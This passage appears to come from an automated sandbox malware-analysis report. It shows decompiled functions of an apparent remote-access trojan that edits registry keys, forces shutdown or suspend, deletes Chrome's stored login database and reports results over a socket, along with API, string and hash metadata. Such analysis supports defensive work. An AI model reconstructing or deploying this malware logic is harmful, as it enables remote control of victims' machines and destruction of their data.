				_push(_t203);
				_t77 = E00741F95( &_a8);
				_push(0xffffffff);
				_t328 = 4;
				_push(_t328);
				_push( &_v52);
				E007442A6( &_a8);
				_t351 = (_t348 & 0xfffffff8) - 0x44;
				E007420EC(_t203, _t351, __edx, _t379, 0x7ac238);
				_t352 = _t351 - 0x18;
				E007420EC(_t203, _t352, __edx, _t379,  &_v68);
				E00757478( &_v108, __edx);
				_t353 = _t352 + 0x30;
				_t335 =  *_t77 - 0x35;
				if(_t335 == 0) {
					E00741F6D(_t203,  &_v76);
					__eflags = E007421F5( &_v88) - 1;
					if(__eflags > 0) {
						E00749DC9(_t203,  &_v80, E00741F95(E00741E49( &_v88, _t320, __eflags, 1)));
					}
					E007420EC(_t203, _t353 - 0x18, _t320, __eflags, E00741E49( &_v88, _t320, __eflags, 0));
					_t88 = E00741EEB( &_v84);
					_t320 = 1;
					_t217 = _t88;
					L37:
					E00751046(_t217, _t320, _t386);
					L38:
					E00741EF0();
					L39:
					E00741E74( &_v88, _t320);
					E00741FC7();
					E00741FC7();
					return 0;
				}
				_t337 = _t335 - 1;
				if(_t337 == 0) {
					_t99 = E00741F95(E00741E49( &_v88, __edx, __eflags, 2));
					_t101 = E00741F95(E00741E49( &_v92, __edx, __eflags, 1));
					_t330 = 0;
					_t102 = E00741E49( &_v96, __edx, __eflags, 0);
					_t356 = _t353 - 0x18;
					E007420EC(_t203, _t356, _t320, __eflags, _t102);
					_t104 = E00750FB5(_t203, __eflags, _t99);
					_t320 = _t101;
					_t105 = E00750D5C(_t104, _t101);
					_t358 = _t356 + 0x18 - 0x18;
					_t233 = _t356 + 0x18 - 0x18;
					__eflags = _t105;
					if(__eflags == 0) {
						_push("2");
						L33:
						E00742084(_t203, _t233);
						E00744AA4(_t203, 0x7ac700, _t320, __eflags);
						goto L39;
					}
					_push("1");
					L20:
					E00742084(_t203, _t233);
					E00744AA4(_t203, 0x7ac700, _t320, __eflags);
					E007420EC(_t203, _t358 - 0x18, _t320, __eflags, E00741E49( &_v120, _t320, __eflags, _t330));
					_t113 = E00741F95(E00741E49( &_v128, _t320, __eflags, 1));
					_t320 = 0;
					E00751046(_t113, 0, __eflags);
					goto L39;
				}
				_t339 = _t337 - 1;
				if(_t339 == 0) {
					E0074427F(_t203,  &_v80, E00741F95(E00741E49( &_v88, __edx, __eflags, 1)));
					 *0x7abd64 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW");
					_t120 = E00741EEB( &_v84);
					_t121 = E00741E49( &_v96, _t320, __eflags, 0);
					_t361 = _t353 - 0x18;
					E007420EC(_t203, _t361, _t320, __eflags, _t121);
					_t123 = E00750FB5(_t203, __eflags, _t120);
					_t362 = _t361 + 0x18;
					__eflags =  *0x7abd64(_t123);
					if(__eflags != 0) {
						_t247 = _t362 - 0x18;
						_push("9");
						L12:
						E00742084(_t203, _t247);
						E00744AA4(_t203, 0x7ac700, _t320, __eflags);
						goto L38;
					}
					_t127 = E00742489();
					_t340 = 2;
					_t203 = E0075184C( &_v84, "\\", _t127 - _t340);
					__eflags = _t203 - 0xffffffff;
					if(__eflags != 0) {
						_t50 = _t203 + 1; // 0x1
						_push( ~(__eflags > 0) | _t50 * _t340);
						_v100 = E0076F4C6( ~(__eflags > 0) | _t50 * _t340, _t50 * _t340 >> 0x20, _t340, __eflags);
						_t135 = E00741EEB(E00747309( &_v84,  &_v36, 0, _t203));
						_t203 = _v112;
						_t323 = _v112 - _t135;
						__eflags = _t323;
						do {
							_t258 =  *_t135 & 0x0000ffff;
							 *(_t323 + _t135) = _t258;
							_t135 = _t135 + _t340;
							__eflags = _t258;
						} while (__eflags != 0);
						E00741EF0();
						_t137 = E00741E49( &_v96, _t323, __eflags, 0);
						_t364 = _t362 - 0x18;
						E007420EC(_t203, _t364, _t323, __eflags, _t137);
						_t320 = 0;
						__eflags = 0;
						E00751046(_t203, 0, 0);
						E0076F4CF(_t203);
						_t365 = _t364 + 0x1c;
						L28:
						_t247 = _t365 - 0x18;
						_push("8");
						goto L12;
					}
					_t141 = E00741E49( &_v96, _t320, __eflags, 0);
					_t367 = _t362 - 0x18;
					E007420EC(_t203, _t367, _t320, __eflags, _t141);
					_t320 = 0;
					E00751046(0, 0, __eflags);
					_t365 = _t367 + 0x18;
					goto L28;
				}
				_t341 = _t339 - 1;
				if(_t341 == 0) {
					_t146 = E00776769(_t144, E00741F95(E00741E49( &_v88, __edx, __eflags, 3)));
					__eflags = _t146 - _t328;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(E00741F95(E00741E49( &_v92, __edx, __eflags, _t328)))));
						_t150 = E00741F95(E00741E49( &_v92, __edx, __eflags, 2));
						_t152 = E00741F95(E00741E49( &_v96, _t320, __eflags, 1));
						_t330 = 0;
						__eflags = 0;
						_t153 = E00741E49( &_v100, _t320, 0, 0);
						_t368 = _t353 - 0x18;
						E007420EC(_t203, _t368, _t320, __eflags, _t153);
						_t155 = E00750FB5(_t203, __eflags, _t150);
						_t369 = _t368 + 0x18;
						_t320 = _t152;
						_t156 = E00750BF8(_t155, _t152);
					} else {
						__eflags = _t146 - 0xb;
						if(__eflags == 0) {
							_t158 = E00741F95(E00741E49( &_v92, __edx, __eflags, _t328));
							_t160 = E00741F95(E00741E49( &_v92, __edx, __eflags, 2));
							_t162 = E00741F95(E00741E49( &_v96, _t320, __eflags, 1));
							_t330 = 0;
							_t163 = E00741E49( &_v100, _t320, __eflags, 0);
							_t370 = _t353 - 0x18;
							E007420EC(_t203, _t370, _t320, __eflags, _t163);
							_t165 = E00750FB5(_t203, __eflags, _t160);
							_t320 = _t162;
							_t156 = E00750C3C(_t165, _t162,  *_t158,  *((intOrPtr*)(_t158 + 4)));
							_t369 = _t370 + 0x24;
						} else {
							_push(_t146);
							E00741E49( &_v92, __edx, __eflags, _t328);
							_push(E00742489());
							_push(E00741F95(E00741E49( &_v92, __edx, __eflags, _t328)));
							_t171 = E00741F95(E00741E49( &_v96, _t320, __eflags, 2));
							_t173 = E00741F95(E00741E49( &_v100, _t320, __eflags, 1));
							_t330 = 0;
							_t174 = E00741E49( &_v104, _t320, __eflags, 0);
							_t372 = _t353 - 0x18;
							E007420EC(_t203, _t372, _t320, __eflags, _t174);
							_t176 = E00750FB5(_t203, __eflags, _t171);
							_t320 = _t173;
							_t156 = E00750B08(_t176, _t173);
							_t369 = _t372 + 0x28;
						}
					}
					_t358 = _t369 - 0x18;
					_t233 = _t369 - 0x18;
					__eflags = _t156;
					if(__eflags == 0) {
						_push("5");
						goto L33;
					} else {
						_push("4");
						goto L20;
					}
				}
				_t384 = _t341 != 1;
				if(_t341 != 1) {
					goto L39;
				}
				E0074427F(_t203,  &_v80, E00741F95(E00741E49( &_v88, __edx, _t384, 1)));
				_t181 = E00741EEB( &_v84);
				_t182 = E00741E49( &_v96, __edx, _t384, 0);
				_t374 = _t353 - 0x18;
				E007420EC(_t203, _t374, __edx, _t384, _t182);
				_t185 = RegCreateKeyExW(E00750FB5(_t203, _t384, _t181), 0, 0, 0, 0x20006, 0,  &_v104, 0, ??);
				RegCloseKey(_v112);
				_t376 = _t374 + 0x18 - 0x18;
				_t247 = _t374 + 0x18 - 0x18;
				_t385 = _t185;
				if(_t185 != 0) {
					_push("7");
					goto L12;
				}
				E00742084(_t203, _t247, "6");
				_push(0x72);
				E00744AA4(_t203, 0x7ac700, _t320, _t385);
				_t205 = E00747323( &_v108, 0x7ac700, 0x7ac700);
				_t386 = _t205 - 0xffffffff;
				if(_t205 != 0xffffffff) {
					_t14 = _t205 + 1; // 0x1
					_t347 = 2;
					_push( ~(__eflags > 0) | _t14 * _t347);
					_v112 = E0076F4C6( ~(__eflags > 0) | _t14 * _t347, _t14 * _t347 >> 0x20, _t347, __eflags);
					_t195 = E00741EEB(E00747309( &_v96,  &_v48, 0, _t205));
					_t206 = _v124;
					_t326 = _v124 - _t195;
					__eflags = _t326;
					do {
						_t313 =  *_t195 & 0x0000ffff;
						 *(_t326 + _t195) = _t313;
						_t195 = _t195 + _t347;
						__eflags = _t313;
					} while (__eflags != 0);
					E00741EF0();
					E007420EC(_t206, _t376 - 0x18, _t326, __eflags, E00741E49( &_v108, _t326, __eflags, 0));
					_t320 = 0;
					E00751046(_t206, 0, __eflags);
					E0076F4CF(_t206);
					goto L38;
				}
				E007420EC(_t205, _t376 - 0x18, _t320, _t386, E00741E49( &_v108, _t320, _t386, 0));
				_t320 = 0;
				_t217 = 0;
				goto L37;
			}

0x00751205
0x00751205
0x00751211
0x00751214
0x00751219
0x0075121d
0x00751223
0x00751228
0x00751229
0x0075122e
0x00751238
0x0075123d
0x00751247
0x00751250
0x00751255
0x00751258
0x0075125b
0x0075176b
0x00751779
0x0075177c
0x00751795
0x00751795
0x007517ab
0x007517b4
0x007517b9
0x007517bb
0x007517bd
0x007517bd
0x007517c5
0x007517c9
0x007517ce
0x007517d2
0x007517db
0x007517e3
0x007517f0
0x007517f0
0x00751261
0x00751264
0x007516f9
0x0075170c
0x00751711
0x0075171a
0x0075171f
0x00751725
0x0075172a
0x00751732
0x00751736
0x0075173c
0x0075173f
0x00751741
0x00751743
0x0075174f
0x00751754
0x00751754
0x00751760
0x00000000
0x00751760
0x00751745
0x0075154e
0x0075154e
0x0075155a
0x0075156f
0x00751581
0x00751586
0x0075158a
0x00000000
0x0075158f
0x0075126a
0x0075126d
0x007515b8
0x007515d8
0x007515dd
0x007515ea
0x007515ef
0x007515f5
0x007515fa
0x007515ff
0x00751609
0x0075160b
0x007516e0
0x007516e2
0x007513c2
0x007513c2
0x007513ce
0x00000000
0x007513ce
0x00751615
0x0075161c
0x0075162e
0x00751630
0x00751633
0x0075165a
0x00751666
0x0075166e
0x00751683
0x00751688
0x0075168e
0x0075168e
0x00751690
0x00751690
0x00751693
0x00751697
0x00751699
0x00751699
0x007516a2
0x007516ac
0x007516b1
0x007516b7
0x007516bc
0x007516bc
0x007516c0
0x007516c6
0x007516cb
0x007516ce
0x007516d1
0x007516d3
0x00000000
0x007516d3
0x0075163a
0x0075163f
0x00751645
0x0075164a
0x0075164e
0x00751653
0x00000000
0x00751653
0x00751273
0x00751276
0x007513eb
0x007513f5
0x007513f7
0x007514f1
0x007514fc
0x0075150f
0x00751514
0x00751514
0x0075151d
0x00751522
0x00751528
0x0075152d
0x00751532
0x00751535
0x00751539
0x007513fd
0x007513fd
0x00751400
0x00751482
0x00751499
0x007514ac
0x007514b1
0x007514ba
0x007514bf
0x007514c5
0x007514ca
0x007514d2
0x007514d6
0x007514db
0x00751402
0x00751402
0x00751404
0x00751410
0x00751422
0x00751430
0x00751443
0x00751448
0x00751451
0x00751456
0x0075145c
0x00751461
0x00751469
0x0075146d
0x00751472
0x00751472
0x00751400
0x00751540
0x00751543
0x00751545
0x00751547
0x00751597
0x00000000
0x00751549
0x00751549
0x00000000
0x00751549
0x00751547
0x0075127c
0x0075127f
0x00000000
0x00000000
0x0075129c
0x007512b6
0x007512c1
0x007512c6
0x007512cc
0x007512da
0x007512e6
0x007512ec
0x007512ef
0x007512f1
0x007512f3
0x007513bd
0x00000000
0x007513bd
0x007512fe
0x00751303
0x0075130a
0x0075131a
0x0075131c
0x0075131f
0x00751341
0x00751346
0x00751350
0x00751358
0x0075136d
0x00751372
0x00751378
0x00751378
0x0075137a
0x0075137a
0x0075137d
0x00751381
0x00751383
0x00751383
0x0075138c
0x007513a1
0x007513a6
0x007513aa
0x007513b0
0x00000000
0x007513b5
0x00751331
0x00751336
0x00751338
0x00000000

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 007512DA
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 007512E6

Part of subcall function 00744AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00744B18

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 007515C7
GetProcAddress.KERNEL32(00000000), ref: 007515CE

Strings

SHDeleteKeyW, xrefs: 007515BD
Shlwapi.dll, xrefs: 007515C2

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: 57eb539da32291c5571059127d1bc657896d087d29b8c33a2e5f71b8281eca2d
Instruction ID: bba8e5e9b13af6a8a9277b61efe0c9517c78c427f5917ab577091c2e84b512d2
Opcode Fuzzy Hash: 57eb539da32291c5571059127d1bc657896d087d29b8c33a2e5f71b8281eca2d
Instruction Fuzzy Hash: 34E1F676A04300E6CA14F7748C5FABE36A99F95702F80052DFD02A71E3EF6C9949C792

Uniqueness

Uniqueness Score: -1.00%

Function 00752BE1, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97
libraryloadershutdownCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00752BE1(void* __edx, void* __ebp, void* __eflags, char _a12, char _a16, void* _a128, void* _a152) {
				void* _t12;
				int _t14;
				int _t20;
				int _t22;
				int _t31;
				intOrPtr* _t64;
				void* _t69;

				_t69 = __eflags;
				E00753958();
				E00741E49( &_a16, __edx, _t69, 0);
				_t12 = E00745A6F("0");
				_push(0);
				_t70 = _t12;
				if(_t12 == 0) {
					E00741E49( &_a12, "0", __eflags);
					_t14 = E00745A6F("1");
					_push(0);
					__eflags = _t14;
					if(__eflags == 0) {
						E00741E49( &_a12, "1", __eflags);
						__eflags = E00745A6F("2");
						if(__eflags == 0) {
							_t64 = GetProcAddress(LoadLibraryA("PowrProf.dll"), "SetSuspendState");
							E00741E49( &_a16, "2", __eflags, 0);
							_t62 = "3";
							_t20 = E00745A6F("3");
							_push(0);
							__eflags = _t20;
							if(__eflags == 0) {
								E00741E49( &_a16, "3", __eflags);
								_t62 = "4";
								_t22 = E00745A6F("4");
								__eflags = _t22;
								if(_t22 != 0) {
									_push(0);
									_push(0);
									_push(1);
									goto L11;
								}
							} else {
								_push(0);
								_push(0);
								L11:
								 *_t64();
							}
						} else {
							_push(0);
							_t31 = E00776769(_t28, E00741F95(E00741E49( &_a16, "2", __eflags, 1))) | 0x00000002;
							__eflags = _t31;
							goto L6;
						}
					} else {
						_t31 = E00776769(_t33, E00741F95(E00741E49( &_a12, "1", __eflags, 1))) | 0x00000001;
						goto L6;
					}
				} else {
					_t31 = E00776769(_t36, E00741F95(E00741E49( &_a12, "0", _t70, 1)));
					L6:
					ExitWindowsEx(_t31, ??);
				}
				_t7 =  &_a16; // 0x744538
				E00741E74(_t7, _t62);
				E00741FC7();
				E00741FC7();
				return 0;
			}

0x00752be1
0x00752be1
0x00752bed
0x00752bf9
0x00752c02
0x00752c03
0x00752c05
0x00752c1d
0x00752c29
0x00752c32
0x00752c33
0x00752c35
0x00752c50
0x00752c61
0x00752c63
0x00752caa
0x00752cac
0x00752cb1
0x00752cb8
0x00752cbd
0x00752cbe
0x00752cc0
0x00752cca
0x00752ccf
0x00752cd6
0x00752cdb
0x00752cdd
0x00752ce3
0x00752ce4
0x00752ce5
0x00000000
0x00752ce5
0x00752cc2
0x00752cc2
0x00752cc3
0x00752ce7
0x00752ce7
0x00752ce7
0x00752c65
0x00752c65
0x00752c7e
0x00752c7e
0x00000000
0x00752c7e
0x00752c37
0x00752c4b
0x00000000
0x00752c4b
0x00752c07
0x00752c16
0x00752c81
0x00752c83
0x00752c83
0x007533c4
0x007533c8
0x007533d4
0x007533e0
0x007533ed

APIs

Part of subcall function 00753958: GetCurrentProcess.KERNEL32(00000028,?), ref: 00753965
Part of subcall function 00753958: OpenProcessToken.ADVAPI32(00000000), ref: 0075396C
Part of subcall function 00753958: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0075397E
Part of subcall function 00753958: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0075399D
Part of subcall function 00753958: GetLastError.KERNEL32 ref: 007539A3

ExitWindowsEx.USER32(00000000,00000001), ref: 00752C83
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00752C98
GetProcAddress.KERNEL32(00000000), ref: 00752C9F

Strings

8Et, xrefs: 007533C4
SetSuspendState, xrefs: 00752C8E
PowrProf.dll, xrefs: 00752C93

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: 8Et$PowrProf.dll$SetSuspendState
API String ID: 1589313981-3400737069
Opcode ID: 34a545a3177258b2fa92547f911cc9c95e024fd640930b67efcc870b3c55da8d
Instruction ID: f38da873483ce5ca13c666c1d02d7b816db962edc27dfa5228fe21a68ee81e7c
Opcode Fuzzy Hash: 34a545a3177258b2fa92547f911cc9c95e024fd640930b67efcc870b3c55da8d
Instruction Fuzzy Hash: EE21B660604301DBCF04FBF1985EAAE22495F45345F40493DBA46AB1D3EF6C8D4D8261

Uniqueness

Uniqueness Score: -1.00%

Function 00749EF4, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00749EF4(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t31;
				void* _t32;

				_t35 = __eflags;
				_t31 = __edi;
				_t30 = E00742084(_t20,  &_v52, E0077988A(_t20, __eflags, "UserProfile"));
				E00745343(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				E00741FC7();
				if(DeleteFileA(E00741F95( &_v28)) != 0) {
					_t28 = _t32 - 0x18;
					_push("\n[Chrome StoredLogins found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t32 - 0x18;
						_push("\n[Chrome StoredLogins not found]");
						L6:
						E00742084(_t20, _t28);
						E0074A6EF(_t20, _t30, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				E00741FC7();
				return _t21;
			}

0x00749ef4
0x00749ef4
0x00749f14
0x00749f19
0x00749f22
0x00749f38
0x00749f5e
0x00749f60
0x00000000
0x00749f3a
0x00749f41
0x00749f44
0x00749f52
0x00749f54
0x00749f65
0x00749f65
0x00749f6a
0x00749f6f
0x00749f4b
0x00749f4b
0x00749f4b
0x00749f44
0x00749f77
0x00749f82

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 00749F30
GetLastError.KERNEL32 ref: 00749F3A

Strings

[Chrome StoredLogins found, cleared!], xrefs: 00749F60
[Chrome StoredLogins not found], xrefs: 00749F54
UserProfile, xrefs: 00749F00
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00749EFB

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: 0dc3d8221cc249bfeea05a4304c0b2cae816236a2f98755ce5921a4d839ea21e
Instruction ID: 7d5a0bfe477c78558c3d0ed535dd99669b4bd05c306bdd97ea8ef8eefc17fa1d
Opcode Fuzzy Hash: 0dc3d8221cc249bfeea05a4304c0b2cae816236a2f98755ce5921a4d839ea21e
Instruction Fuzzy Hash: C001D6716D1109AB8F08B774EC5FCBF7B64A9233007800269F506D61D2FF1D5A5AC6D2

Uniqueness

Uniqueness Score: -1.00%

Function 00753958, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00753958() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
			}

0x0075396c
0x0075397e
0x0075398a
0x00753996
0x0075399d
0x007539b2

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00753965
OpenProcessToken.ADVAPI32(00000000), ref: 0075396C
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0075397E
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0075399D
GetLastError.KERNEL32 ref: 007539A3

Strings

SeShutdownPrivilege, xrefs: 00753978

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 57de3efaf6b7e4c8d90b5cf3779ae9fbe37c25f097164650246925da2bfbc99c
Instruction ID: a60987210bc6c228598a7d89e50398e392288c658d9cf959de4f333ae17899b5
Opcode Fuzzy Hash: 57de3efaf6b7e4c8d90b5cf3779ae9fbe37c25f097164650246925da2bfbc99c
Instruction Fuzzy Hash: FBF034B5902129ABEB10ABA4ED0DAEFBFBCEF05611F104056B809A1050E6384B05CAB5

Uniqueness

Uniqueness Score: -1.00%

Function 007477EC, Relevance: 9.3, APIs: 6, Instructions: 324
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E007477EC(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t106;
				intOrPtr* _t111;
				signed int _t121;
				void* _t133;
				void* _t154;
				void* _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t172;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				void* _t206;
				char* _t220;
				char* _t221;
				void* _t255;
				void* _t264;
				signed int _t267;
				void* _t273;
				void* _t279;
				void* _t281;
				intOrPtr _t282;
				void* _t283;
				void* _t284;
				void* _t287;

				_t255 = __edx;
				_t188 = __ecx;
				E007910A8(E00792622, _t279);
				_t282 = _t281 - 0x300;
				 *((intOrPtr*)(_t279 - 0x10)) = _t282;
				_t185 = _t188;
				 *(_t279 - 0x18) = _t185;
				E007420D5(_t185, _t279 - 0x9c);
				 *(_t279 - 0x1c) =  *(_t279 - 0x1c) | 0xffffffff;
				 *_t185 = 0;
				 *(_t279 - 4) =  *(_t279 - 4) & 0x00000000;
				_t186 = _t185 + 4;
				E0074498B(_t186);
				_t283 = _t282 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t106 = E00744A08(_t255, _t264);
				_t289 = _t106;
				if(_t106 == 0) {
					_push(0);
					_push(0);
					goto L4;
				} else {
					_t283 = _t283 - 0x18;
					E00742F93(_t186, _t283, E00742FB7(_t279 - 0x6c, _t279 + 0x38, 0x7ac238), _t289, _t279 + 0x50);
					_push(0x64);
					_t186 = _t186 & 0xffffff00 | E00744AA4(_t186, _t186, _t179, _t289) == 0xffffffff;
					E00741FC7();
					_t291 = _t186;
					if(_t186 != 0) {
						E00744E0B( *(_t279 - 0x18) + 4);
						 *((intOrPtr*)(_t279 - 0x20)) = 1;
						_push(0x7a85d0);
						_t157 = _t279 - 0x20;
						L3:
						_push(_t157);
						L4:
						E0077205A();
					}
				}
				_t266 = E0074230A(_t279 + 0x20, _t279 - 0x30);
				_t111 = E007422CD(_t279 + 0x20, _t279 - 0x34);
				E00748226(_t279 - 0x3c,  *((intOrPtr*)(E0074230A(_t279 + 0x20, _t279 - 0x38))),  *_t111,  *_t109);
				_t284 = _t283 + 0xc;
				_t256 = _t279 + 8;
				_t273 = FindFirstFileW(E00741EEB(E00747514(_t279 - 0x6c, _t279 + 8, _t291, "*")), _t279 - 0x304);
				 *(_t279 - 0x1c) = _t273;
				E00741EF0();
				_t291 = _t273 - 0xffffffff;
				if(_t273 != 0xffffffff) {
					goto L7;
				} else {
					_t283 = _t284 - 0x18;
					E00742084(_t186, _t283, 0x79f6bc);
					_push(0x65);
					E00744AA4(_t186,  *(_t279 - 0x18) + 4, _t256, _t291);
					E00744E0B( *(_t279 - 0x18) + 4);
					 *((intOrPtr*)(_t279 - 0x24)) = 2;
					_push(0x7a85d0);
					_t157 = _t279 - 0x24;
					goto L3;
				}
				while(1) {
					L7:
					_t121 = FindNextFileW(_t273, _t279 - 0x304);
					__eflags = _t121;
					if(_t121 == 0) {
						break;
					}
					_t186 =  *(_t279 - 0x18);
					__eflags =  *_t186;
					if( *_t186 == 0) {
						__eflags =  *(_t279 - 0x304) & 0x00000010;
						if(( *(_t279 - 0x304) & 0x00000010) == 0) {
							L31:
							E0074427F(_t186, _t279 - 0x84, _t279 - 0x2d8);
							_t266 = E0074230A(_t279 - 0x84, _t279 - 0x3c);
							_t276 = E007422CD(_t279 - 0x84, _t279 - 0x38);
							E00748226(_t279 - 0x30,  *((intOrPtr*)(E0074230A(_t279 - 0x84, _t279 - 0x34))),  *_t139,  *_t137);
							_t284 = _t284 + 0xc;
							__eflags = E00748097(_t279 - 0x84, _t279 + 0x20, 0) - 0xffffffff;
							if(__eflags == 0) {
								L34:
								E00741EF0();
								_t273 =  *(_t279 - 0x1c);
								continue;
							} else {
								E00741FD1(_t279 - 0x9c, _t256, _t276, E007420AB(_t186, _t279 - 0x54, _t256, __eflags, _t279 - 0x304, 0x250));
								E00741FC7();
								_t284 = _t284 - 0x18;
								_t256 = E00742F93(_t186, _t279 - 0x54, E0075739C(_t186, _t279 - 0xb4, _t279 + 8), __eflags, 0x7ac238);
								E00742F93(_t186, _t284, _t152, __eflags, _t279 - 0x9c);
								_push(0x66);
								_t154 = E00744AA4(_t186, _t186 + 4, _t152, __eflags);
								__eflags = _t154 - 0xffffffff;
								_t186 = _t186 & 0xffffff00 | _t154 == 0xffffffff;
								E00741FC7();
								E00741FC7();
								__eflags = _t186;
								if(_t186 == 0) {
									goto L34;
								} else {
									 *((intOrPtr*)(_t279 - 0x2c)) = 4;
									_push(0x7a85d0);
									_t157 = _t279 - 0x2c;
									goto L3;
								}
							}
						} else {
							_t220 = ".";
							_t158 = _t279 - 0x2d8;
							while(1) {
								_t256 =  *_t158;
								__eflags = _t256 -  *_t220;
								if(_t256 !=  *_t220) {
									break;
								}
								__eflags = _t256;
								if(_t256 == 0) {
									L17:
									_t159 = 0;
								} else {
									_t256 =  *((intOrPtr*)(_t158 + 2));
									_t43 =  &(_t220[2]); // 0x2e0000
									__eflags = _t256 -  *_t43;
									if(_t256 !=  *_t43) {
										break;
									} else {
										_t158 = _t158 + 4;
										_t220 =  &(_t220[4]);
										__eflags = _t256;
										if(_t256 != 0) {
											continue;
										} else {
											goto L17;
										}
									}
								}
								L19:
								__eflags = _t159;
								if(_t159 == 0) {
									goto L31;
								} else {
									_t221 = L"..";
									_t160 = _t279 - 0x2d8;
									while(1) {
										_t256 =  *_t160;
										__eflags = _t256 -  *_t221;
										if(_t256 !=  *_t221) {
											break;
										}
										__eflags = _t256;
										if(_t256 == 0) {
											L25:
											_t161 = 0;
										} else {
											_t256 =  *((intOrPtr*)(_t160 + 2));
											_t46 =  &(_t221[2]); // 0x2e
											__eflags = _t256 -  *_t46;
											if(_t256 !=  *_t46) {
												break;
											} else {
												_t160 = _t160 + 4;
												_t221 =  &(_t221[4]);
												__eflags = _t256;
												if(_t256 != 0) {
													continue;
												} else {
													goto L25;
												}
											}
										}
										L27:
										__eflags = _t161;
										if(__eflags == 0) {
											goto L31;
										} else {
											_t256 = E00748250(_t186, _t279 - 0xb4, _t279 + 8, __eflags, E0074427F(_t186, _t279 - 0x54, _t279 - 0x2d8));
											E007430A6(_t186, _t279 - 0x6c, _t164, _t266, __eflags, "\\");
											E00741EF0();
											E00741EF0();
											_t287 = _t284 - 0x18;
											E00747350(_t186, _t287, _t164, __eflags, _t279 + 0x20);
											_t284 = _t287 - 0x18;
											E00747350(_t186, _t284, _t164, __eflags, _t279 - 0x6c);
											_t172 = E00747C55(_t186, _t164, __eflags);
											__eflags = _t172;
											if(_t172 != 0) {
												E00741EF0();
												goto L31;
											} else {
												 *((intOrPtr*)(_t279 - 0x28)) = 3;
												_push(0x7a85d0);
												_t157 = _t279 - 0x28;
												goto L3;
											}
										}
										goto L37;
									}
									asm("sbb eax, eax");
									_t161 = _t160 | 0x00000001;
									__eflags = _t161;
									goto L27;
								}
								goto L37;
							}
							asm("sbb eax, eax");
							_t159 = _t158 | 0x00000001;
							__eflags = _t159;
							goto L19;
						}
						L37:
						E00741FC7();
						E00741EF0();
						E00741EF0();
						E00741FC7();
						_t133 = E00741FC7();
						 *[fs:0x0] =  *((intOrPtr*)(_t279 - 0xc));
						return _t133;
					} else {
						FindClose(_t273);
						_t206 = _t186 + 4;
					}
					L10:
					E00744E0B(_t206);
					goto L37;
				}
				 *(_t279 - 4) =  *(_t279 - 4) | 0xffffffff;
				FindClose(_t273);
